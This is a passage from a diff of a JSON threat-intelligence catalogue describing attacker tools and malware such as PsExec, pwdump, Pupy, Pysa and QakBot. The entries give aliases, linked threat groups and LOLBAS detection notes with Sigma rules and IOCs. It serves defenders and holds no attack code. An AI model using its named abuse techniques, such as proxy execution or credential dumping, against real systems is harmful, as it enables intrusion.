[proc_creation_win_provlaunch_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml)\n* Sigma: [proc_creation_win_registry_provlaunch_provisioning_command.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml)\n* Sigma: [registry_set_provisioning_command_abuse.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml)\n* IOC: c:\\windows\\system32\\provlaunch.exe executions\n* IOC: Creation/existence of HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands subkeys[[Provlaunch.exe - LOLBAS Project](/references/56a57369-4707-4dff-ad23-431109f24233)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5144", + "source": "Tidal Cyber", + "tags": [ + "9e5ec91c-0d0f-4e40-846d-d7b7eb941e17", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "7eaa281e-d584-46da-bf0a-abc1fd34f925", + "type": "similar" + } + ], + "uuid": "83e1ac24-3928-40ba-b701-d72549a9430c", + "value": "Provlaunch" + }, + { + "description": "[Proxysvc](https://app.tidalcyber.com/software/94f43629-243e-49dc-8c2b-cdf4fc15cf83) is a malicious DLL used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://app.tidalcyber.com/software/94f43629-243e-49dc-8c2b-cdf4fc15cf83) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. [[McAfee GhostSecret](https://app.tidalcyber.com/references/d1cd4f5b-253c-4833-8905-49fb58e7c016)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0238", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "069af411-9b24-4e85-b26c-623d035bbe84", + "type": "similar" + } + ], + "uuid": "94f43629-243e-49dc-8c2b-cdf4fc15cf83", + "value": "Proxysvc" + }, + { + "description": "[PS1](https://app.tidalcyber.com/software/8cd401ac-a233-4395-a8ae-d75db9d5b845) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://app.tidalcyber.com/groups/) campaign.[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0613", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "13183cdf-280b-46be-913a-5c6df47831e7", + "type": "similar" + } + ], + "uuid": "8cd401ac-a233-4395-a8ae-d75db9d5b845", + "value": "PS1" + }, + { + "description": "[PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.[[Russinovich Sysinternals](https://app.tidalcyber.com/references/72d27aca-62c5-4e96-9977-c41951aaa888)][[SANS PsExec](https://app.tidalcyber.com/references/a8d1e40d-b291-443c-86cc-edf6db00b898)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0029", + "source": "MITRE", + "tags": [ + "950e8d3a-044b-43e3-b5db-bba61f70ff51", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "7902f5cc-d6a5-4a57-8d54-4c75e0c58b83", + "type": "used-by" + }, + { + "dest-uuid": "3a54b8dc-a231-4db8-96da-1c0c1aa396f6", + "type": "used-by" + }, + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "a3b39b07-0bfa-4c69-9f01-acf7dc6033b4", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "72d9bea7-9ca1-43e6-8702-2fb7fb1355de", + "type": "used-by" + }, + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "used-by" + }, + { + "dest-uuid": "d428f9be-6faf-4d57-b677-4a927fea5f7e", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "55b20209-c04a-47ab-805d-ace83522ef6a", + "type": "used-by" + }, + { + "dest-uuid": "1bcc9382-ccfe-4b04-91f3-ef1250df5e5b", + "type": "used-by" + }, + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "b5c28235-d441-40d9-8da2-d49ba2f2568b", + "type": "used-by" + }, + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "a41725c5-eb3a-4772-8d1e-17c3bbade79c", + "type": "used-by" + }, + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "used-by" + }, + { + "dest-uuid": "0f86e871-0c6c-4227-ae28-3f3696d6ae9d", + "type": "used-by" + }, + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "type": "similar" + } + ], + "uuid": "73eb32af-4bd3-4e21-8048-355edc55a9c6", + "value": "PsExec" + }, + { + "description": "[[Psr.exe - LOLBAS Project](/references/a00782cf-f6b2-4b63-9d8d-97efe17e11c0)]", + "meta": { + "id": "1ff4ff25-6d92-4b1e-9e13-b463e4be35a0", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1945584b-bb16-48a2-902d-2a1c9591efcd", + "type": "similar" + } + ], + "uuid": "85383485-01f9-42a5-9b44-c45c03eae766", + "value": "Psr.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Problem Steps Recorder, used to record screen and clicks.\n\n**Author:** Leon Rodenko\n\n**Paths:**\n* c:\\windows\\system32\\psr.exe\n* c:\\windows\\syswow64\\psr.exe\n\n**Resources:**\n* [https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx](https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx)\n\n**Detection:**\n* Sigma: [proc_creation_win_psr_capture_screenshots.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml)\n* IOC: psr.exe spawned\n* IOC: suspicious activity when running with \"/gui 0\" flag[[Psr.exe - LOLBAS Project](/references/a00782cf-f6b2-4b63-9d8d-97efe17e11c0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5145", + "source": "Tidal Cyber", + "tags": [ + "08f4ef8d-94bb-42f7-b76d-71bcc809bcc9", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "85383485-01f9-42a5-9b44-c45c03eae766", + "type": "similar" + } + ], + "uuid": "1945584b-bb16-48a2-902d-2a1c9591efcd", + "value": "Psr" + }, + { + "description": "[Psylo](https://app.tidalcyber.com/software/8c35d349-2f70-4edb-8668-e1cc2b67e4a0) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4). It has similar characteristics as [FakeM](https://app.tidalcyber.com/software/8c64a330-1457-4c32-ab2f-12b6eb37d607). [[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0078", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6c1bdc51-f633-4512-8b20-04a11c2d97f4", + "type": "used-by" + }, + { + "dest-uuid": "dfb5fa9b-3051-4b97-8035-08f80aef945b", + "type": "similar" + } + ], + "uuid": "8c35d349-2f70-4edb-8668-e1cc2b67e4a0", + "value": "Psylo" + }, + { + "description": "[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)][[Secureworks IRON TILDEN Profile](https://app.tidalcyber.com/references/45969d87-02c1-4074-b708-59f4c3e39426)]", + "meta": { + "id": "a1cda810-73ac-4485-82af-6f01e0c71e97" + }, + "related": [ + { + "dest-uuid": "7fed4276-807e-4656-95f5-90878b6e2dbb", + "type": "similar" + } + ], + "uuid": "e3e379e2-1543-4794-9b89-852ba7f6eac7", + "value": "Pterodo" + }, + { + "description": "[Pteranodon](https://app.tidalcyber.com/software/7fed4276-807e-4656-95f5-90878b6e2dbb) is a custom backdoor used by [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067). [[Palo Alto Gamaredon Feb 2017](https://app.tidalcyber.com/references/3f9a6343-1db3-4696-99ed-f22c6eabee71)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0147", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "used-by" + }, + { + "dest-uuid": "5f9f7648-04ba-4a9f-bb4c-2a13e74572bd", + "type": "similar" + }, + { + "dest-uuid": "e3e379e2-1543-4794-9b89-852ba7f6eac7", + "type": "similar" + } + ], + "uuid": "7fed4276-807e-4656-95f5-90878b6e2dbb", + "value": "Pteranodon" + }, + { + "description": "[[Pubprn.vbs - LOLBAS Project](/references/d2b6b9fd-5f80-41c0-ac22-06b78c86a9e5)]", + "meta": { + "id": "ddb84c06-8f51-446c-ad1d-8c68c194a499", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "58883c83-d5be-42fc-b4bd-9287e55cd499", + "type": "similar" + } + ], + "uuid": "a5f525c2-c9ad-4b97-be30-659bbc34107d", + "value": "Pubprn.vbs" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Proxy execution with Pubprn.vbs\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs\n* C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs\n\n**Resources:**\n* [https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/](https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/)\n* [https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology](https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology)\n* [https://github.com/enigma0x3/windows-operating-system-archaeology](https://github.com/enigma0x3/windows-operating-system-archaeology)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_pubprn.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml)[[Pubprn.vbs - LOLBAS Project](/references/d2b6b9fd-5f80-41c0-ac22-06b78c86a9e5)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5260", + "source": "Tidal Cyber", + "tags": [ + "8177e8ac-f80d-477d-b0af-c2ea243ddf00", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "a5f525c2-c9ad-4b97-be30-659bbc34107d", + "type": "similar" + } + ], + "uuid": "58883c83-d5be-42fc-b4bd-9287e55cd499", + "value": "Pubprn" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-320A (November 2023), Pulseway is a publicly available, legitimate tool that \"enables remote monitoring and management of systems\". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5068", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + } + ], + "uuid": "74eb97b8-fc2c-41f0-b497-aad08a52777e", + "value": "Pulseway" + }, + { + "description": "[[Morphisec ShellTea June 2019](https://app.tidalcyber.com/references/1b6ce918-651a-480d-8305-82bccbf42e96)]", + "meta": { + "id": "4403132d-1d58-43ac-a916-805983d9bd09" + }, + "related": [ + { + "dest-uuid": "d8999d60-3818-4d75-8756-8a55531254d8", + "type": "similar" + } + ], + "uuid": "8f1073b3-4371-488d-b299-7e6f6e6fcae9", + "value": "ShellTea" + }, + { + "description": "[PUNCHBUGGY](https://app.tidalcyber.com/software/d8999d60-3818-4d75-8756-8a55531254d8) is a backdoor malware used by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) that has been observed targeting POS networks in the hospitality industry. [[Morphisec ShellTea June 2019](https://app.tidalcyber.com/references/1b6ce918-651a-480d-8305-82bccbf42e96)][[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)] [[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0196", + "source": "MITRE", + "tags": [ + "6c6c0125-9631-4c2c-90ab-cfef374d5198" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c", + "type": "similar" + }, + { + "dest-uuid": "8f1073b3-4371-488d-b299-7e6f6e6fcae9", + "type": "similar" + } + ], + "uuid": "d8999d60-3818-4d75-8756-8a55531254d8", + "value": "PUNCHBUGGY" + }, + { + "description": "[[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]", + "meta": { + "id": "b0f3c20b-987b-4c29-bb83-b047ea178d52" + }, + "related": [ + { + "dest-uuid": "1638d99b-fbcf-40ec-ac48-802ce5be520a", + "type": "similar" + } + ], + "uuid": "b81c8997-5615-4fc9-a091-a5842cf69819", + "value": "PSVC" + }, + { + "description": "[PUNCHTRACK](https://app.tidalcyber.com/software/1638d99b-fbcf-40ec-ac48-802ce5be520a) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) to scrape payment card data. [[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)] [[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0197", + "source": "MITRE", + "tags": [ + "6c6c0125-9631-4c2c-90ab-cfef374d5198" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "c4de7d83-e875-4c88-8b5d-06c41e5b7e79", + "type": "similar" + }, + { + "dest-uuid": "b81c8997-5615-4fc9-a091-a5842cf69819", + "type": "similar" + } + ], + "uuid": "1638d99b-fbcf-40ec-ac48-802ce5be520a", + "value": "PUNCHTRACK" + }, + { + "description": "[Pupy](https://app.tidalcyber.com/software/0a8bedc2-b404-4a9a-b4f5-ff90ff8294be) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. [[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)] It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). [[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)] [Pupy](https://app.tidalcyber.com/software/0a8bedc2-b404-4a9a-b4f5-ff90ff8294be) is publicly available on GitHub. [[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)]", + "meta": { + "platforms": [ + "Android", + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0192", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", + "type": "similar" + } + ], + "uuid": "0a8bedc2-b404-4a9a-b4f5-ff90ff8294be", + "value": "Pupy" + }, + { + "description": "PuTTy is an open-source SSH and telnet client.[[PuTTY Download Page](/references/bf278270-128e-483b-9f09-ce24f5f6ed80)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5065", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "15787198-6c8b-4f79-bf50-258d55072fee" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + } + ], + "uuid": "313c78e9-488d-4fbc-a6e5-05c0df3cb8a4", + "value": "PuTTy" + }, + { + "description": "[pwdump](https://app.tidalcyber.com/software/77f629db-d971-49d8-8b73-c7c779b7de3e) is a credential dumper. [[Wikipedia pwdump](https://app.tidalcyber.com/references/6a1a1ae1-a587-41f5-945f-011d6808e5b8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0006", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "7902f5cc-d6a5-4a57-8d54-4c75e0c58b83", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", + "type": "similar" + } + ], + "uuid": "77f629db-d971-49d8-8b73-c7c779b7de3e", + "value": "pwdump" + }, + { + "description": "[PyDCrypt](https://app.tidalcyber.com/software/51b2c56e-7d64-4e15-b1bd-45a980c9c44d) is malware written in Python designed to deliver [DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76). It has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) since at least September 2021, with each sample tailored for its intended victim organization.[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1032", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a41725c5-eb3a-4772-8d1e-17c3bbade79c", + "type": "used-by" + }, + { + "dest-uuid": "2ac41e8b-4865-4ced-839d-78e7852c47f3", + "type": "similar" + } + ], + "uuid": "51b2c56e-7d64-4e15-b1bd-45a980c9c44d", + "value": "PyDCrypt" + }, + { + "description": "[[CERT-FR PYSA April 2020](https://app.tidalcyber.com/references/4e502db6-2e09-4422-9dcc-1e10e701e122)][[DFIR Pysa Nov 2020](https://app.tidalcyber.com/references/a00ae87e-6e64-4f1c-8639-adca436c217e)][[NHS Digital Pysa Oct 2020](https://app.tidalcyber.com/references/5a853dfb-d935-4d85-a5bf-0ab5279fd32e)]", + "meta": { + "id": "300e845e-5b85-4dd8-a8f1-6202c1cbbb45" + }, + "related": [ + { + "dest-uuid": "e0d5ecce-eca0-4f01-afcc-0c8e92323016", + "type": "similar" + } + ], + "uuid": "da345299-97db-4e76-b81f-265ebd54cbcb", + "value": "Mespinoza" + }, + { + "description": "[Pysa](https://app.tidalcyber.com/software/e0d5ecce-eca0-4f01-afcc-0c8e92323016) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.[[CERT-FR PYSA April 2020](https://app.tidalcyber.com/references/4e502db6-2e09-4422-9dcc-1e10e701e122)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0583", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a19c1197-9414-46e3-986f-0f609ff4a46b", + "type": "similar" + }, + { + "dest-uuid": "da345299-97db-4e76-b81f-265ebd54cbcb", + "type": "similar" + } + ], + "uuid": "e0d5ecce-eca0-4f01-afcc-0c8e92323016", + "value": "Pysa" + }, + { + "description": "[[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)][[ATT QakBot April 2021](https://app.tidalcyber.com/references/c7b0b3f3-e9ea-4159-acd1-f6d92ed41828)]", + "meta": { + "id": "986bf1c1-04d0-414f-bcaf-d809ec422091" + }, + "related": [ + { + "dest-uuid": "9050b418-5ffd-481a-a30d-f9059b0871ea", + "type": "similar" + } + ], + "uuid": "96dcc3d3-057c-4e81-b833-a9f09c1f3194", + "value": "Pinkslipbot" + }, + { + "description": "[[Trend Micro Qakbot December 2020](https://app.tidalcyber.com/references/c061ce45-1452-4c11-9586-bd5eb2d718ab)][[Red Canary Qbot](https://app.tidalcyber.com/references/6e4960e7-ae5e-4b68-ac85-4bd84e940634)][[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)][[ATT QakBot April 2021](https://app.tidalcyber.com/references/c7b0b3f3-e9ea-4159-acd1-f6d92ed41828)]", + "meta": { + "id": "bd740660-b68f-4f6b-b349-519a6db9ca23" + }, + "related": [ + { + "dest-uuid": "9050b418-5ffd-481a-a30d-f9059b0871ea", + "type": "similar" + } + ], + "uuid": "11b32ebe-8ee3-46bc-aaf0-b0761dfa9c0c", + "value": "QBot" + }, + { + "description": "[[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)]", + "meta": { + "id": "8af95392-abee-4203-8b47-cf68adab9b9e" + }, + "related": [ + { + "dest-uuid": "9050b418-5ffd-481a-a30d-f9059b0871ea", + "type": "similar" + } + ], + "uuid": "e26ce4bb-2117-4f21-be70-5cb4c448c303", + "value": "QuackBot" + }, + { + "description": "[QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) and [Egregor](https://app.tidalcyber.com/software/0e36b62f-a6e2-4406-b3d9-e05204e14a66).[[Trend Micro Qakbot December 2020](https://app.tidalcyber.com/references/c061ce45-1452-4c11-9586-bd5eb2d718ab)][[Red Canary Qbot](https://app.tidalcyber.com/references/6e4960e7-ae5e-4b68-ac85-4bd84e940634)][[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)][[ATT QakBot April 2021](https://app.tidalcyber.com/references/c7b0b3f3-e9ea-4159-acd1-f6d92ed41828)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0650", + "source": "MITRE", + "tags": [ + "e096f0dd-fa2c-4771-8270-128c97c09f5b", + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "used-by" + }, + { + "dest-uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "type": "used-by" + }, + { + "dest-uuid": "edc5e045-5401-42bb-ad92-52b5b2ee0de9", + "type": "similar" + }, + { + "dest-uuid": "96dcc3d3-057c-4e81-b833-a9f09c1f3194", + "type": "similar" + }, + { + "dest-uuid": "11b32ebe-8ee3-46bc-aaf0-b0761dfa9c0c", + "type": "similar" + }, + { + "dest-uuid": "e26ce4bb-2117-4f21-be70-5cb4c448c303", + "type": "similar" + } + ], + "uuid": "9050b418-5ffd-481a-a30d-f9059b0871ea", + "value": "QakBot" + }, + { + "description": 